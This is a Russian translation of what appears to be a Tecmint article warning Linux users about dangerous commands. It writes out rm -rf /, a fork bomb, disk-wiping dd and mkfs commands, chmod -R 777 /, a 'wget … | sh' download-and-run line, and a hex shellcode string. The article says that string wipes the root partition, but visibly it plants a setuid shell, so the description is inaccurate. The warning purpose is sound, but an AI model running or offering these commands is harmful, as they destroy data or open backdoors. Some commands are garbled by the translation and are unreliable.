Поиск по сайту:

Самые опасные команды — их никогда не следует выполнять в Linux


Интерфейс командной строки — мощная и удобная утилита для администрирования системы Linux. Он обеспечивает быстрый и универсальный способ запуска системы, особенно при управлении автономными системами, не имеющими графического интерфейса.

Хотя командная строка полезна для управления вашей системой, она таит в себе риски. Выполнение неверных команд может нанести непоправимый вред вашей системе. В этом руководстве мы собрали список некоторых самых рискованных команд, о выполнении которых в вашей системе не следует думать.

1. rm -rf /Команда

команда rm — это команда Linux, используемая для удаления файлов и каталогов в зависимости от используемых аргументов. Однако следует соблюдать крайнюю осторожность при использовании команды rm, поскольку небольшая опечатка или ошибка могут привести к невосстановимому повреждению системы.

При выполнении от имени пользователя root с опцией -rf / команда рекурсивно удаляет все файлы и каталоги в вашей системе, начиная с корневого каталога (/), который является самым высоким в Linux. Структура иерархии файлов. Короче говоря, команда rm -rf / полностью уничтожает вашу систему, что приводит к ее поломке и невозможности восстановления.

Некоторые параметры, используемые с командой rm:

  • Команда rm в Linux используется для удаления файлов.
  • Команда rm -r рекурсивно удаляет папку, даже пустую.
  • Команда rm -f удаляет «Файл только для чтения» без запроса.
  • rm -rf /: принудительно удалить все в корневом каталоге.
  • rm -rf * : принудительно удалить все в текущем/рабочем каталоге.
  • rm -rf . : принудительное удаление текущей папки и подпапок.

Фактически, когда вы запустите команду от имени обычного пользователя, вы получите на терминале два предупреждения.

Чтобы избежать случайного удаления файлов с помощью команды «rm», создайте псевдоним команды 'rm' как 'rm -i' в файл “.bashrc”, он будет просить вас подтвердить каждое удаление.

2. :(){:|:&};: Команда

Вышеупомянутое на самом деле является вилочной бомбой. Он работает путем создания функции под названием ':', которая вызывает себя дважды: один раз на переднем плане и один раз в фоновом режиме. Функция выполняется повторно и при этом потребляет все системные ресурсы, что приводит к сбою системы.

Фактически, команда «вилочная бомба» — это, по сути, форма DoS-атаки (отказ в обслуживании). Его также называют вирусом Ваббит или Кролик. Хуже всего то, что вам не нужно быть пользователем root, чтобы запустить эту атаку.

К счастью, вы можете защитить себя от этой атаки, ограничив количество процессов, запускаемых локальными пользователями, примерно до 4000.

Вы можете сделать это, выполнив команду:

ulimit -S -u 4000

Позже вы можете проверить это с помощью команды:

ulimit -u

3. команда > /dev/sda

Выполнение команды, за которой следует >/dev/sda, перезаписывает блок /dev/sda на вашем жестком диске. Этот блок содержит данные файловой системы, и его перезапись приводит к повреждению системы, которое невозможно восстановить.

4. папка mv /dev/null

Еще одна вредная операция, которую не следует выполнять, — это перемещение каталога или файла в /dev/null. Файл /dev/null — это файл особого типа, известный как нулевое устройство или «черная дыра». Все, что перемещается в /dev/null, отбрасывается и уничтожается.

Следующая команда перемещает все содержимое домашнего каталога пользователя в /dev/null, тем самым удаляя все данные, содержащиеся в домашнем каталоге пользователя.

mv /home/user/* /dev/null

5. wget http://malicious_source -O- | ш

Команда wget — это команда, которая загружает файлы с веб-сайта или файлового сервера. Приведенная выше команда загружает скрипт из вредоносного источника и затем выполняет его.

6. mkfs.ext3 /dev/sda

Команда mkfs создает новую файловую систему (ext2, ext3, ext4 и т. д.) на отформатированном устройстве хранения данных, в большинстве случаев это раздел жесткого диска. Выполнение команды mkfs для раздела стирает все хранящиеся в нем данные.

Форматирование всего диска (например, mkfs.ext3 /dev/sda) полезно при форматировании разделов диска, но приводит к сбою системы и оставляет ее в невосстановимом состоянии. Это происходит потому, что он уничтожает все системные файлы вместе с вашими личными данными.

Команда также может принимать другие формы, как показано ниже.

mkfs.ext4 /dev/sda
mkfs.xfs /dev/sda
mkfs.btrfs /dev/sda

7. > команда «Файл»

Файл > удаляет содержимое файла и оставляет его пустым. Это синоним команды cat /dev/null > file. Поэтому следует соблюдать осторожность при использовании операторов перенаправления в системе Linux.

Ниже приведена демонстрация того, как эта команда перезаписывает текстовый файл. Вы можете себе представить катастрофу, которую может вызвать эта команда, если задействованный файл является файлом конфигурации.

8. ^foo^бар

Команда ^foo^bar настолько же опасна, насколько и полезна, в зависимости от того, как она выполняется. Хотя это позволяет вам редактировать ранее выполненные команды и выполнять их снова, это может иметь катастрофические последствия, если вы не заинтересованы в изменениях, внесенных в команды перед их запуском.

9. dd if=/dev/random of=/dev/sda

Приведенная выше команда удаляет блок /dev/sda и записывает в него случайные ненужные данные. Ваша система останется на нестабильной и необратимой стадии.

10. Чмод -Р 777/

Хотя это может и не привести к немедленному сбою вашей системы Linux, команда chmod -R 777 / рекурсивно назначает все разрешения (чтение, запись и выполнение) всем файлам в вашей системе Linux, начиная с корня.

Это фактически предоставляет доступ ко всем критически важным файлам конфигурации и другим файлам всем пользователям, что представляет собой огромный риск для безопасности вашей системы. Любой, у кого гнусные намерения, может изменить важные файлы и легко сломать вашу систему.

11. Скрытый приказ

Команда ниже — это не что иное, как первая команда выше (rm -rf). Здесь коды спрятаны в шестнадцатеричном формате, чтобы неосведомленный пользователь мог обмануться. Запуск приведенного ниже кода в вашем терминале сотрет ваш корневой раздел.

Эта команда показывает, что угроза может быть скрытой и иногда ее обычно невозможно обнаружить. Вы должны осознавать, что делаете и каков будет результат. Не компилируйте и не запускайте коды из неизвестного источника.

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

Примечание. Не выполняйте ни одну из приведенных выше команд в терминале или оболочке Linux, а также на компьютере друга или в школе. Если вы хотите их протестировать, запустите их на виртуальной машине.

Любая несогласованность или потеря данных из-за выполнения вышеуказанной команды приведет к поломке вашей системы, за которую ни Автор статьи, ни Tecmint не несут ответственности.

Это все на данный момент. Скоро я снова буду здесь с еще одной интересной статьей, которую вы с удовольствием прочтете. А до тех пор оставайтесь с нами и будьте на связи с Tecmint.

Если вы знаете какие-либо другие подобные Опасные команды Linux и хотите, чтобы мы добавили их в список, сообщите нам об этом через раздел комментариев и не забудьте оставить ценный отзыв.